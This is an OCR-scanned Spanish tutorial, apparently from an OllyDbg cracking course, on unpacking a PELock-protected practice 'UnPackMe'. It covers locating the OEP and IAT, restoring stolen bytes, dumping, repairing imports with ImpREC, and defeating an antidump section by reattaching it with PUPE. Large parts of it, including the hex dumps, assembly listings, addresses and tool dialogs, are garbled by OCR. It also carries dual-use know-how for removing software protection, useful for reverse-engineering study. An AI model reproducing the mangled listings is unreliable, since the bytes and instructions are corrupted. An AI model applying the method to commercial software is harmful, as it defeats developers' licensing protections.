50463000) 0990083000 | UnPackMe' .teddy Tesources Imag|R RWE 
50468000 09BBABBO | UnPackMe| .teddy |SFX, imports| Imag|R RUE 
00430000) 00021000 Priv! Ru RU 
004B9000| DOBB900B Map ¡RE RE 
0570000 | DOBBZ2000 Map ¡RE RE 
B0530000 | 00103000 Map |R R 
60699000) 00001000 Privi Riu Ru 
B06AB000' Ba141000 Map ¡RE RE 
09400009) 000B100a Priv! Ru Ru 
DO9BB000 | BOBBIO0A Priv! Ru Ru 
BO9CO00H | DOBOBZODA Map |R R Device sHarddiskUVo lu 
009000009 00001009 Priv! Ru RU 
BOASDOOÓ | DOBBID0A Priv! Ri RU 
DORADOS | DOBBZODA Priv! Ri RU 
BBA70000 | OABBZODA Map |R R 
BBASOB0n| BBB3CODA Priv Ri Ru 
BACON 6001000 riv|Ru RU 
DOBCEMA! BB2000 riv[RlY- Gual Ru 
61230001 (5J5/515]5] Map |R R 
53030000 | 008B1006| COMCTL32 PE hsÉéder Imag|R RUE 
53031000) 00070006| COMCTL32| .text code, import;j Imag|R RUE 
53CA1000| 00993096 | COMCTL32! .data data Imag|R RUE 


Vemos que el programa salta a esa seccion y que el programa original arrancado desde el OEP no 
puede saltar a una seccion afuera del exe sin haberla creado antes con VirtualAlloc o similares, por 
lo cual concluimos que esa seccion fue creada por el packer y no es parte del codigo original del 
programa asi como los JMPS que saltan a ella, como por ejemplo el que esta en el falso OEP y hay 
muchos mas. 


Por lo tanto es posible que en esa seccion el packer haya transladado algunos calls y jmps que 
toman valores de la IAT y ya que el OLLYDBG si lo tenemos configurado asi. 


ES Debugging options 


Commands | Disasm | cpu | Registers | Stack | Analysis 1 | Analysis 2 | Analysis 3 | 
Security Debug Events | Exceptions | Trace | SEX | Strings | Addresses | 


[4 Set high priority when tracing debugged process 
T “Wam about frequent conditional breaks 
[Y Smart update of memory map 


[Y Compress analysis data 


Search for references in: 
C Executable code of corresponding module 
>» Memory block currently selected in Disassembler 


Use hardware breakpoints to step or trace code 


Hide non-existing source files 


El Undo | Cancel 


Busca solo en la seccion que esta visible en el listado en ese momento, pues, como la seccion creada 
por el packer no esta visible en el listado, no buscara alli. 


Probemos buscar las referencias en otras secciones. 


Lal 


94 

FF1S 300E4600 
- E9 211098FF 

218D B56275BF 

8388D_S09E3A85 

Er ES 


6310 

98 

FF63 3D 

35 SF6EED32 
£DB6 EA14DE41 
8DB6 D429BC383 


8DB6_A9537307 
= 6F1098FF 


FF15_ 30094600 
E9 371098FF 


S7FF 
15 29C0B4600 
E9 C41098FF 


C4FF 
15 7C0E4600 
ES FALB98FF 


aaa aaa 
IDDODDDDD 


Za 4345 9] 


3IRWEITW 
22 TWELOW 


£CHG_EAX, ESP 


AND DWORD _PTR SS: CEBP+BF7562057,ECx 
MOU BYTE PTR_SS: [EBP+853A9E80],CL 


E WORD PTR DS: [EAXI, Dx 


S0R EAX, 32ED6ESF 

LEA ESI,DWORD PTR DS: [ESI+41DE14EA] 
LEA ESI,DWORD PTR DS: [ESI+83BC29D4] 
LEA ESI,DWORD PTR DS: [ESI+77853A9] 


OUTS DxX,DWORD_PTR ES: [EDI] 
2CHG_EDI,EDI 
ADC EAX, 460B9C 


LES EDI,EDI 
ADC EAX, 460E7C 


FT 


y M0 E Y 2 2 0 1 11 E EN E 


USER32.GetSysCo lor 
UnPackMe. 60461820 


UnPackMe. 004010AB 
1/0 command 

GDI32.DeleteObject 
UnPackMe. 604B815CF 


UnPackMe. 60461118 
Illegal use of register 


UnPackMe. 60406115A 


Alli tenemos una de las secciones creadas por el packer vemos como mi teoria funciona, no 


hallamos referencias, porque los calls estan transladados a otras secciones (por eso yo insisto que 
no hay que usar solo un metodo, en este caso, para ver si una entrada es de la ¡at o no, necesitamos 
o bien buscar en las secciones creadas por el packer, o bien mirar si van las entradas a la seccion 
code de una dll en el mapa de memoria y listo) 


Pero bueno ahora tenemos visible una de las secciones creadas por el packer busquemos la 
referencia en esta. 


DUO LUDADOUARLDL 1 LOLA LREPNELOCA 


Follow DWORD in Dump 


View executable do 


Copy to executable file 
Go to 


vw Hex 
Text 
Short 
Long 
Float 
Disassemble 
Special 


A] 


dx] 0) +) $8] + Je) m] 7/9/80) Jx]8/r/J8] l5] 


Address |Disassemb ly Comment 


E pens re 


Nada, pero a no desanimar que hay mas secciones creadas por el packer, pasemos a ver la siguiente. 


FONTE LJ Elm) TIw)Hl el7]K 


Address 

60330000) 000501000 
560390000) 00001000 
60340000: 00010000 


00490000 00991000) UnPackMe 
00491000| 00044000) UnPackMe| .teddy | code 
0044E6000| B099COGA UnPackMe!| .teddy 
00457000 | 009909000) UnPackMe!| .teddy 
504600009 | 000903090 | UnPackMe| .teddy 
00463000 | 00993009) UnPackMe!| . teddy 
004568900| 00994009 UnPackMe!| . teddy 


00430000| 00021000 
004E0000| 000069006 
00570000| 00BB2000 
00530000) 00103000 
00690000 000610008 
D0SADOGO'| 00141000 
00940000 | 00001000 
009E0000| 00004000 
009C0000| DOBB300a 
00900000 | 000610008 
5 5151515185]515155515151) 
515 /5(:]51515185]51515J515]5]5) 
00A70000 | OBBOZ200B 
B0AS0000| BOBSCODA 
BOACOOBO 100B10Ga 
DOBCEOOÓ| DOBB2000 
01230000| 00062000 


53C30000| 000610068) COMCTLSZ 


A 


Section [Contains 


PE header 


resources 
SFX, imports 


PE header 


E pens ser o 


Device 


D 26 
2Foss17C 
B 02 
20 
c3 
28D6424 EC 


63 2100AC00 
E9 2C089D57B 
Bcc 


DOE 
DODO 


35 BBACOBEB 
B10CCc3 

Pigi ECEBB20C 
FF7S 08 


y 


Ahora busugemos referencias. 


ale ela ll 0 al 


OR_AL, 49 

INT 20 

PUSH _7CS10382F 
INT 20 


LEA ESP, DWORD PTR SS: [ESP-14] 
PUSH_9ACOBZ1 


OR AL, Ci 


1 La 
A FFEBB21 LOCK ADD BYTE PTR_DS: [EBX+CDOB2EBFF], CL 


AND BYTE _PTR SS: [EBP+68], DL 

20R EAX, EBOBACOD 

ADD OWORD_PTR DS: CEBX+EAX*S],ECX 
ADD BYTE PTR DS: [EBX+CO2EBEC], CL 


DEC ECX 
PUSH DWORD PTR SS: [EBP+8] 


1JEJjmr)w] e] Jx) 8] RJ.) 5] 


kerne132.70810) yc 
LOCK pref ix 


Nada pero como hay unas cuantas secciones y sabemos que un call que lee valores de la entrada 


460124 sera 
CALL [460124] 
y los bytes del comando seran 


FF 15 24 0f 46 00 


por ejemplo si vemos este otro call a una api 


OUDO M7221 O0Ur 


- E9 6F1098FF 
6F 


FF1S_ 30094600 
= E 37r1p98FF 
de 600 
> 2a109sFF 


OUTS DxX,DWORD_PTR ES: [EDI] 


XCHG_EDI,EDI 
ADC EAX, 460B9C 


ES ENT ENT 


LEM ESiI¿UWURE Tin DUO LEDILTI SODOM 


UnPackMe. 004015AB 
1/0 comman 

GDI32.DeleteObject 
UnPackMe. 004B15CF 


UnPackMe.00401118 


Tllamal nera al namnictarm 


Vemos que el la secuencia de bytes del call sera FF 15 y a continuacion los bytes de la direccion de 
la entrada al reves, asi que podemos hacer un search de esos bytes por toda la memoria y asi 
podemos buscar si hay una referencia en alguna parte sin tener que cambiar de seccion en seccion. 


[m] File View Debug Plugins Options Window Help 


CEEL eu] vis] $e] +] LE] CEA KlB|R/-. Js] 53?) 


110090/ GBBB1BBA 
120000 | 6OBB10Da 
96120000 | 00061008 
90120000| 0000390a stack of ma 


00250000 | BOBBS00A 
10260000 | BOBO3ADA 
116090 Mev ¡cerHardd iskUo lume 14) INDOWS+System32UNICODE . NLS 
xDevicesHarddiskUVolume 1) INDOWS+System32ÑLOCALE. NLS 
Mew ¡ce sHardd iskUo lume 134 INDOWS+System32sSORTKEY. NLS 
Aev icerHardd iskUo lume 11) INDOWS+Sy stem32SORTTBLS. NLS 


le 


DO0320000 | BOBBEDOA 
10330000 | 00041009 


$ 
mm 


[2] 
60400000 | 00991000| UnPackMe PE header 
00401000| 0004A000| UnPackMe| .teddy | code 
UnPackMe| .teddy 
UnPackMe!| .teddy 
UnPackMe| .teddy 


2 a 


D0463000| 00BBSOBA | UnPackMe| .teddy | resources Imag RUE 
0046B000| BOBBAGOO| UnPackMe| .teddy  |SFX, imports| Imag RWE 
[2] Priv/Ru Ru 
Map E RE 
Map E RE 
BBS90000| BO1B3000 Map R 
10690000) 0001000 Priv| Ru Ru 
4101 Map E RE 
Priv|Ru Ru 
paga! Priv|Ru Ru 
1BOB9COBAA| BOBAZODA Map |R R xDevicerHarddiskVolume1vWINDOWS+System32xCTYPE. NLS 
109000090 00001000 Priv| Ru Ru 
Priv|Ru Ru 
Priv|Ru Ru 
Map |R R 
6BASOaDa Priv Ru Ru 
BBACO00n Priv| Ru Ru 
BBECEDOD Priv|Rll  Guaj Ru 
LAA DOCACACACA | CACACACA DIACALA Mar D D 


Vamos al mapa de memoria y alli hacemos click derecho 


18 Access | InitialjMapped as 


riu 

Priv! RU Gl rw : — 
riu - 

ma pu E Gu Actualize 

riy y 

Hao [E | Dump in CPU 
riu 

Ed | 

Map | Ru 

Map |R 

Map |R 

Map |R Set break-on-access F2 


Enter binary string to search for 


ascii S5%F 
UNICODE [**F 


HEX +06 Ñi 15 24 BF 46 aal 


[Y Entire block 


<i >) 
[Case sensitive Cancel | 


Y escribimos en laparte de HEX la secuencia de bytes que queremos hallar y apretamos OK y no 
salen resultados grr, pero como somos persistentes y por supuesto hay muchas formas de llamar a 
una api que no son call indirectos le quitaremos el FF 15 y buscaremos solo la direccion de 
memoria. 


Enter binary string to search for 


Aascil 


FeF 


UNICODE [*F 


HEX +04 [+ GF 46 88 


Y Entire block 


Case sensitive 


Alli encontro algo y justo en una de las seciones creadas por el packer, vayamos al listado a ver esta 


zona. 


A o 3 33.F.09vú 


Cancel | 


S8F.U1UU 1hGe..0 
t0ú 1 3t3F. dEbd 


¿UM Y 
0. +4.E.0 31 
Sxoo Cmos 
*iCEs .Udyú ist 
D'/1G2At- 1635004 

-«Dú 14” BNiC4a* 
LC 9TEWIC+30>U=y 
ú =hñ...USy6 3 3 
S5.F.UivÚ ¿ 35.F. 


S.FaU+TÓ + 3 


EJEA en] vis $0] el] + u]ejmjr]wjH]c]7[x]8/R]..] 5] 


- E9 SCEBIAFF 
8068 30 
BDE9 


BDE9 


E4 EB 


Alli hallamos la bendita referencia, claro nosotros probamos buscar con FF 15 que es un call 
indirecto y no probamos con FF 25 que es un JMP indirecto, pero bueno, buscando de esta ultima 


SBEB 
Ey FFSBFF1S 741 


D3EB 
9A_FFOS6SFO 50: 
BDE9 


MOU WORD PTR DS: [EAX-80],65 
ADD BYTE PTR DS: [EAX], AL 
ADD CL,CH 

MOU EBP,EBX 


INC ESI 
ADD CL,CH 
SHR EBXx, CL 
ADD _CL,CH 


IN AL.G0EB 


o 
UnPackHe. 043503E 


Far call 


Far call 


1/0 command 


forma nos sale las referencias para cualquier comando que haya para llamar a la api. 


Por lo tanto quiere decir que esa es una entrada de la IAT. 


Eh-PE.USuú ¿hebE 


HSL 
IFB.Ow, $ 


olWRwWiú 3Nw 
8]NwE +Zw 


Y alli termnina la IAT ya que mas abajo antes de ponerme a buscar referencias ya veo que no hay 
valores que vayan a la seccion code de ninguna dll con lo cual ya directamente no son entradas de la 
TAT, la cual termina en 460128. 


Bueno los datos de la IAT son 


LARGO=FINAL -INICIO= 460128 - 460818= 710 


A A E ARA AIRE 


Command 450128 - 460818 y] HEX: 710- DEC: 1808 - ASCII: DO 


Memnaru hreaknnint when esecutina (14271 RM 
Asi que poniendo en limpio 


OEP=271B0 
RVA o INICIO=60818 
SIZE O LARGO=710 


Ahora vemos que la IAT esta toda correcta asi que llegaremos nuevamente al falso oep, le 
agregaremos los stolen bytes y dumpearemos. 


Aquí llego al falso OEP. 
Los stolen bytes eran 


55 8B EC 6A FF 68 60 OE 45 00 68 C8 92 42 00 64 Al 00 00 00 00 50 64 89 25 00 00 00 00 83 C4 
AS 53 56 57 89 65 ES 


Los pego en el dumpeado a partir de 4271b0 como habiamos visto en la parte 39. 


NOP 
PUSH_EBP 
MOU EBP,ESP 
FF PUSH -1 

68 60BE4500 PUSH 450E60 


68 CS924200 PUSH_4292C3 
64:A1 000000050| MOU EAX, DWORD PTR FS: [6] 


a 50 PUSH_EAX 

a 64:8925 6000061 MOV DWORD_PTR FS: [0],ESP 
a 8304 AS ADD ESP, -58 

a 53 PUSH EBX 

ae 56 PUSH ESI 


De 


PUSH EDI 
8965 ES MOU DWORD _PTR SS: CEBP-18],ESP 
E9 SAD66500 JMP 00484865 

0033 ADO BYTE PTR DS: CEBX 


1, DH 
043891534 |ROR BYTE PTR DS: CEDX+341589D4], CL 
5 OUT 45,AL 1/0 command 
ADD BYTE PTR DS: TEBX+FFE181C8],CL 
ADD BYTE PTR DS: [EAXJI, AL 
ADD dE A DS: TECX+45E6309D], CL 


ADD C 

LODPDE' SHORT 004271FF UnPackMe. 004271FF 
ADD ECxX,EDXx 

mou DWORD PTR DS: [45E62C],ECXx 
SHR EAXx, 15 

Mou DWORD PTR DS: [45E628],EAXx ÓN 
CALL B84293A8 UnPackMe. 084293A0 


TEST_EAXx,EAX 
JNZ, SHORT 6842721A UnPackle . 804272 


Am 
pa 
o 
pus] 
o 
res ER 
El 
a] 
. 
|> 


90 MEANSE 


Dí 
y) 
-o 
lr 
La 
. 
= 
EN 
E 
10 


Start Address: [400000 Size: [75000 
Entry Point: [égosc > Modify: 271b0 Get ElP as DEP | Cancel | 


Base of Code: fi 000 Base 


ÍV Fix Raw Size € Offset of Dump Image 


| Section | Virtual Size_ | Virtual Offset | Raw Size | Raw.Olfset_| Charactaristios | 
teddy 00044000 ODOOTODO  00D4ADOO 00001000 COOODDED 
teddy — OO00CODO — 0DO4E000  000OCOOO 00048000 COOODDED 
teddy 00003000 00057000 00003000 00057000 COO0DDED 
teddy 00003000 0DOSO00O 00003000 00060000 COO0ODEO 
teddy 00008000 0DOS3000 00008000 00063000 COO0ODEO 
teddy — 00004000 ODOSBOOO — 0000ADOO 00068000 COOODDED 


[Rebuild Import 
(* Method] : Search JMP[API] | CALL[API] in memory image 
O Method2: Search DLL 4: 4PI name string in dumped file 


Alli camble el OEP para que se corrija y le quito la tilde en REBUILD IMPORTS y apreto dump 
para dumpear. 


— 


Mis sitios de red Nombre: dumpeado pelock Jj bd | Gu 


Tipo: | Executable file(*. exe] Pub Ca 


Alli lo guardamos como dumpeado pelock, ahora podemos repararle la IAT con este mismo que 
tenemos detenido en el OEP ya que la misma estaba correcta, asi que abro el IMP REC. 


LN = 


r 1847 Infos needed. 1 - 
DEP [000271 B0 187 AutoSearch | A 
Ava [oos0818 Size [710 | 


Load Tree | Save Tree | Get Imports UN 


Le colocamos los datos de la IAT que averiguamos y apretamos GET IMPORTS. 


E A 


+ ? FThunk:00060818 NbFunc:1C4 [decimal:452] valid: NO 


Vemos que dice que NO, pero si recordabamos no hay entradas redireccionadas el problema es que 
el packer cambio los ceros que separan las diferentes entradas de cada dll por basura, si miramos. 


Alli se ve claro en vez de haber ceros entre las diferentes entradas de cada dll, hay basura, esto el 
IMP REC lo arregla facilmente, apretemos SHOW INVALID. 


O A 


=- ?FThunk:00060818 NbFunc:1C4 [decimal:452] valid. NO 
rva:00060818 mod: advapi32. dll ord:.01CB name:RegCloseKey 
rva:0006081C mod: advapi32.dll ord:01£4 name:RegOpenkKeyE xó, 
rva:00060820 mod: adwapi32. dll ord:.01CF name:RegCreateKeyE x4, 
rva:00060824 mod: adwapi32.dll ord.01FB name:RegSetYalueE x4, 
rva:00060828 mod: adwapi32. dll ord.01£E name:RegQueryWalueE x4, 


11165 


rya: 00060830 mod:cometl32. dll ord:0011 name: InitCommonControls 
rva: 00060834 mod:cometl32. dll ord:002D name:lmageList_Destroy 


Es 


Ahi corroboramos lo que deciamos estan las entradas de advapi32.dll y la separacion con las de 
comctl32.d1l es basura, asi que como tenemos todas esas basuras marcadas al haber apretado 
SHOW INVALID, hacemos click deerecho CUT THUNKS y anulara todas esas entradas. 


A HIPUOILEO FURICUDTES FUUI 


rva:00060818 mod: advapi32. dll ord:01CB name:F 
rva:0006081€ mod: advapi32.dll ord:01E4 name:F 
rva:00060820 mod: advapi32. dll ord:01CF name:F 
rva:00060824 mod: advapi32. dll ord:01FB name:F 


rva-0006083 Invalidate functions) 
imwa.D006083 — Disassemble | HexYview 


Trace Levell (Disasm) 


¡Trace Level2 (Hook) 
oem Trace Level3 (Trap Flag) 
Current imports: PluGki Tracats h 


D (decimal:0) valid rn 
104 (decimal: 452] im 


(B (decimal:11] unres 


Lara Ralata Fhuimbict 


-Imported Functions Found 
+- advapi32.dll FThunk:00060818 NbFunc:5 [decimal:5] valid:YES 
+ cometl32. dll FThunk:00060830 NbFunc:2 [decimal:2] valid: YES 
+)- gdi32. dll FThunk:0006083C NbFunc:4D (decimal: 77] valid: YES 
+ kemel32. dll FThunk:00060974 NbFunc:8C (decimal:140) valid YES 
+ oleaut32. dll FT hunk:D00060B48 NbFunc:10 [decimal:16] valid: YES 
+ shell32. dll FThunk:O00060BEC NbFunc:3 (decimal: 3] valid: YES 
+ user32. dll FT hunk:ODO60BFC NbFunc:4,3 (decimal:163] valid: YES 
+ vinmem. dll FT hunk:ODO60E8C NbFunc:1 [decimal:1] valid: YES 
E) winspool.dr* FThunk:D00060E 94 NbFunc:8 [decimal:8] valid: YES 


Advanced Commands » Jer 


Como vemos al anular las entradas basura en IMP REC ya no las toma en cuenta y la tabla se 
arregla, quedando esas entradas basura sin efecto. 


Ahora apreto FIX DUMP para arreglar el dumpeado. 


Fixing a dumped file... 
C [decimal:12] module(s) 

1839 (decimal: 441] imported function(s). 

* New section added successfully, RW4:00075000 SIZE:00002000 

Image Import Descriptor size: FO; Total length: 1F1E == 
C:ADocuments and Settinas+Ricardo*E scritorio+dumpeado pelock_.exe saved successf 


Y alli creo el dumpeado pelock_.exe con la IAT reparada, , y ahora si corro el archivo reparado da 
error que ocurre, abramoslo en OLLYDBG.sin cerrar el otro que tengo detenido en el OEP aun. 


Como me da un error de formato lo paso en el LORDPE en la opcion REBUILDPE para que repare 
el header, y ahora si podemos verlo en OLLYDBG correctamente. 


[c] File View Debug Plugins Options Window Help 


a El vie] $0) ul +] 1]2e/mT/wjn|c/+[x]8/R]... s| 


PUSH_EBP 


SPEC MOU EBP,ESP 

6A FF PUSH -1 

63 6B0E4500 PUSH 450E60 

68 [8924200 PUSH_42920C3 

Ea Al 0000BBBa Estad ¿DWORD PTR FS: [0] 
dd: 8925 0009901 MOU DWORD _PTR FS: [61,ESP 
38304 AS ADD ESP, -53 

PUSH EBX 

56 PUSH ESI 

PUSH EDI 

MOU DWORD _PTR SS: [EBP-18],ESP 


ADD BYTE PTR DS: [EBxXJI,DH 


ATADO 


DO 


B 
B 
B 
B 
B 
L 
( 

C 
D 
D 


3| 8965 ES 
5 /-— ES SAD6659b 


BB33 

D28A_ 04891534 [|ROR BYTE PTR DS: [EDxX+341589D4],CL 
E6 45 OUT 45, AL 1-0 command 
0038 CS8S1E1FF [ADD BYTE PTR DS: [EBX+FFE1S1C81, CL 


MAA Mit Tn nn 


=k rutv rw 
NO rwEÚ rw 
HH We... 
134, E EX 
aa EJ” w 
fo "wEj'w 
Ai ur y 
Di "wrá'w 
DUI 
wWS=wA[T tw 
A WRE'w 
O 


Alli se ve la TAT correctamente reparada por el IMP REC, vemos que el mismo reemplazo los 
valores basura por ceros para que la separacion quede perfecta entre las entradas de las diferentes 
dlls, sin embargo al correrlo aquí en OLLYDBG da error que ocurre. 


Pues muy facil aquí viene el proximo punto que debemos estudiar, luego de reparar un dumpeado, 
la IAT y arreglar los stolen bytes si tiene, aun nos queda un truco mas que tienen muchos packers el 
ANTIDUMP. 


Hay muchos tipos de antidump algunos son simplemente un chequeo de si el programa esta 
dumpeado, chequeando la imagesize para ver el largo, o la cantidad de secciones, para ver si el IMP 
REC, agrego la seccion que siempre coloca para reparar la IAT, pero en este caso, el antidump son 
varias secciones que el packer creo en tiempo de ejecucion y que desvia ciertas partes del programa 
alli, y al dumpear no tenemos dichas secciones, por lo cual el dumpeado no corre, lo vemos 
claramente en el EP. 


doo ol cl IA Ok ca 1) 7) 717191 41145 py] 


55 PUSH EBP 
3 11] BBEC MOU EBP,ESP 
3 31 6A FF PUSH -1 
3 '5| 68 6BBE450B PUSH 450E60 
3 AL. 68 CS924200 PUSH 429208 
3 Fl 64:A1 BOBBBBBA| MOV EfiX, DWORD “TR FS: 10] 
300 s| 58 PUSH E 
3 6|  64:8925 BOBBBAÍ MOU DUDRD PTR FS:[01,ESP 
3 Dl 8304 AS ADD ESP, -58 
3 B| 53 PUSH EBX 
3 1| 56 PUSH ESI 
3 2 PUSH EDI 
3 3| 8965 ES MOU DWORD PTR SS: CEBP-18],ESP 
3 6|- E9 SADE6650n JMP 00484865 
3 El 0033 ADD BYTE PTR DS: C[EBX],DH 
3 Ol D2sA D4891534 |ROR BYTE PTR DS: CEDX+341589D4],CL 
3 3 E6 45 OUT 45,AL 1/40 command 
” y CUA PANA A nn mitre PYXTIMA Ma POMAdAPMTOTTT4 Ma 


El programa comenzara a ejecutarse pero al llegar al JMP dara error traceemos hasta alli. 


CEE ell] vis] $00) l] >) ojejmitiwju[c][k/8|R 


ADD ESP, -58 

PUSH EBX 

PUSH ESI 

PUSH_EDI 

MOU DWORD _PTR SS: [EBP-18],ESP 
JMP 090AS4865 


ADD BYTE PTR DS: LEBX 


1, DH 
ag D4891534 Ep Be PTR DS: [EDX+341589D4], CL DR 
AOS PAmtF1FE [On RUTE PTR NMS-TERY+FEFIS1PNA1 P 


1/0 command 


y € 


Vemos que si apreto F7 salta a una seccion inexistente. 


[c] File View Debug Plugins Options Window Help 


ex] et] vie] $e] ] + 1jelmjt[wjnjc])1 


Y no puede continuar mas si miro el original, veo que el JMP si nos lleva a una zona que creo el 
packer en tiempo de ejecucion. 


CL BB eo] vis] sd] 1] +l Ljejlmitiwje 


BYTE PTR DS: [EBx1,DH Backup 
BYTE PTR DS: TEDX+3415 

45, AL Copy 
BYTE PTR DS: CEBX+FFE1 s 
BYTE PTR DS: [EAXJI, AL Binary 


AA DS: CECX+45EE Assemble 


1033 
D28A_D43891534 
E6 45 

BOSB CSs1E1FF 
ls ]51s) 

B039 BO30E645 
Baci 


El 8 Label 
B3CA ADD ECX, EDX 

295D 2CE64598 |MOU DWORD PTR DS: [45E62C] Comment 
C1ES 16 SHR EAXx, 10 

AS 23E64500 MOU DWORD PTR DS: [456628] Breakpoint 


SS TEST EAX, EAX 
Se DR Run trace 


6A 1c 

ES 49010000 

38304 04 

Es Di2F0000 Go to 
35c0 a 


TEST EAX.ERX 


Hago click derecho-FOLLOW y me muestra donde saltara el JMP. 


MA] A AA AAA A E E E E E E E E E A E 
FF15 DCOA4646 kerne 132, GetVersion 

E9 6C299AFF UnPackMe. 664271DC 

6c INS BYTE PTR ES: [EDIJ,DXx 140 command 

FF15 24094600 kerne 132. GetCommandL ineA 

E9 CS299AFF UnPackMe. 00427244 

C3 FF1580 ENTER 15FF,Sb 

1946 BB OR DWORD _PTR DS: [ESI],EAX 

E9 532A9AFF 

53 PUSH_EBX 

8D05 E4ESF1B3 [LEA EAXx, DWORD PTR DS: [BSF1ESE4] 
8030 261A0E4C (LEA EAX,DWORD PTR DS: [ERAX+4C0E1A26] 
E9 562A9AFF NS UnPackMe. 004272F0 


56 

FF1S 9C0B4600 kerne 132. GetModu leHandleA 
E9 562A9AFF UnPackMe. 664272FC 

56 PUSH ESI 

68 FFOB00Ma PUSH_BFF 
E CF2A9AFF pican 


FF1S EO3D4500 UnPackMe. 0042706 
ES C92A9AFF UnPackMe. 00427336 


63 80000090 
E9 7D2B9AFF 


YD 8D 
BS 6EFSC6DD ADD EAX, DOCÉFS6E 


UnPackMe.004272DB 


UnPackMe. 00427445 


Alli vemos que ejecuta un CALL a una api y luego vuelve al codigo, hay muchas formas de reparar 
esto, pero la mas sencilla es agregarle al dumpeado la seccion que le falta y ubicarla en la misma 
posicion, como se hace esto, pues vamos a ver. 


Miremos en el original la seccion faltante, primero le agregaremos esta que es la que nos da error al 
inicio si llega a faltar alguna mas la agregaremos despues. 


Necesitamos DUMPEAR solo la seccion que nos falta, para ello utilizaremos el PUPE que es una 
muy buena herramienta para dumpear partes de procesos o secciones sueltas entre muchos usos, asi 
que buscamos el pupe que estara adjunto al tutorial. 


Cerremos el OLLYDBG con el dumpeado y dejamos el original que esta detenido en el falso OEP y 
lo abrimos en el PUPE. 


ID Modulo | N*Threads | Prioridad 


pupe.exe DDOOOFAS ODOO0D0O 00000001 Normal 
lordpe.exe ODO00C?8 00000000 00000002 Normal 
importrec.exe 00000998 ODOO00000 00000002 Normal 
unpackme_pelock1.06.d.exe 000008B0 ODOO0000 ODOD0002 Normal 
petools. exe 00000618 ODOO0D0O 00000001 Normal 
mwinhlp32.exe R 00000F34 00000000 00000001 Normal 
winhlp32.exe Da 00000F14 0000000 00000001 Normal 


Hacemos click derecho- CAJA DE HERRAMIENTAS 


Caja de Herramientas E 


Proceso: Junpackme_pelock1.06.d.exe 


c:idocuments and settingsticardo.escritoriolunpackme_pel... 00400000 00075000 
ci windows system324ntdll. dll 7023910000 00086000 
c windows, system324kemel32. dll 7C800000 00101000 
cwindowssystem32vwinram. dll 76BODODO 0002000 
c windows! system324user32. dll 77D10000 ODO9S0O0O 


Imprimir | Módulo Sel. [ T Forzar Proyección —[ Yolcador Total 


(+ Reconstruir 


— Buscador 


C Alinear 


Cadena de bytes a buscar: Ñ — Más Herramientas —— 


Localizar Limpiar Parchear _ Mapa | 
. Editor PE 


Estado: ¡Seleccione módulo con el boton derecho del ratón. __Depurador | 
Acerca de Salir WYolc. Parcial 


Alli esta abierto el proceso ahora vayamos el mapa de memoria para dumpear la seccion faltante, 
vamos a MAPA. 


— Localizadas 
Motor de busqueda: (e Ascii Hex 


Recordamos que la seccion faltante empezaba en A80000 asi que la buscamos en el mapa del pupe. 


Ml 


| Dirección (Hex) | Tamaño (Hex] | Estado | Protección 
00984000 ODDOCODO Reservado N¿D 
DOSCODOO 00003000 Usado Lectura 
009C3000 0000D 000 Libre Indefinida 
0090000 00001000 Usado Lect¿Escr 
00901000 0007FODO Reservado N¿D 3 
00450000 00004000 Usado Lect¿Escr 
00454000 ODOOCODO Reservado N¿D 

00460000 00003000 Usado Lect*Escr 
004,63000 0000000 Reservado N¿D 

00470000 00002000 Usado Lectura 

004,72000 ODODE ODO Libre Indefinida 


Bb 00480000 ODO3C000 Usado Lect¿Escr 
Es 0046000 00004000 Libre Indefinida 
¿Alco 00001000 Usado Lect*Escr 
21000 Libre Indefinida 


zar 


Wolcar | Imprimir | 


Alli esta apretamos VOLCAR y la guardo con el nombre seccion. 


Esportar dirección 


seccion 


Ahora abro el PE EDITOR y la agregare al dumpeado. 
o 


y cyberpinball.exe 
69 rx For Winamp 
(9) dumpeado pelock.exe 


Y idumpeado pelock_.exe 


EP O_setup.exe 
y"2000 TY | Fecha di 


Tamaño 


Busco el dumpeado reparado y lo abro en el PE EDITOR. 


o LS 


File Alignment: 00000200 
Subsystem: [oo02 IES 


Tables: 


Apreto sections. 


Section Table Viewer 


Virtual Oífset_| RawSize__ | Raw.Offset 
00044000 DO0010DO 00049183 00ODO40O  CODOOOEO 
DODOCOOO 00048000 OO0MBEDE 00049600 CODDOOEO 
00009000 00057000 0000550 00055600 CODDOOEO 
00003000 00060000 000010DE  ODOSAEOO  CODOOOEO 


00008000 00063000 0000789D O005C000 CODDODEO 
00004000 D006B000 DODOS6F8 00063400 CODOODEO 
00002000 00075000 00001F20 0006D 200 EDO00060 


Do a right mouse click on a sectionname for more options... 


Alli vemos las secciones del dumpeado que son las mismas del original, mas la seccion mackt que 
agrego el IMP REC para arreglar la IAT, pues bien agreguemosle la seccion faltante al final. 


Hago click derecho y apreto COPY A SECTION FROM HD TO EOF (End of file) 


edit section 


add a section 
Doa delete the section 


copy the section to HD 
move the section to HD 
copy a section from HD to EOF 


seccion was copied successfully to the end of the file ! 
(Offset: OOD6F120h Size: OOO3CODOh) 
Should 1 write the new section into the PE Header ? 


GE +] 


Section Table Viewer ES) 


| Section | VitualSize_ | Virtual Offset_| RiawSize__ | Fiawoffset__ | Characterstios | 
teddy 00044000 DO0010DO 00049183 00000400 COODOOED 
teddy DODOCOOO — DO04BO0O  OO00BEDE 00049600 COODODED 
teddy 00009000 00057000 0000550 00055600 COODODED 
teddy 00003000 00060000 00001008 O0054E00  COODODED 
teddy 00008000 00063000 0000789D  0005CODO  COODODED 
teddy 0DO0A000 — DO06E000  00003F8 000638400 COODDOED 
.mackt 00002000 00075000 00001F20  00OSD200  E0DODOGO 
seccion 0O03C0O00 00077000 0003C000  ODOSFI20  CODODO4O 


Do a right mouse click on a sectionname for more options... 


Ahora solo nos queda cambiarle el VIRTUAL OFFSET a 0A80000 para que arranque alli ya que es 
la direccion en la que arrancara. 


a 
E 2ccion ODO3C( 

ES 

A 

1 


Ahora debo cambiar la direccion del Virtual Offset a 0a80000 restandole 400000 quedaria. 


“O36U444] UM 11M] comal g3z FE header LT 
76361000. 00039998. comdla32 CUE code. import: Imaa R 


Command ? 0a80000-0400000 +] HEX: 680000 - DEC: 6815744 - ASCII: h 


[ haranra hraabnnintimbarn avacutina MÑAD TAME 


RWE 
RUE 


680000 seria la direccion del virtual offset de la nueva seccion. 


Edit Section: seccion 


New Walues 


Current Yalues 


Name: [seccion Name: [seccion apply changes 
[0003c000 do nothin 

Virtuel Size: ODOSCOOO || vintuel Size: [o003co0o E 

Vituel Offset [00077000 | vituetoriser > [DUESODOO 

Raw Size: foooacooo | Raw Size: [0003co00 

Raw Difset: [00077000 Raw offset: [00077000 

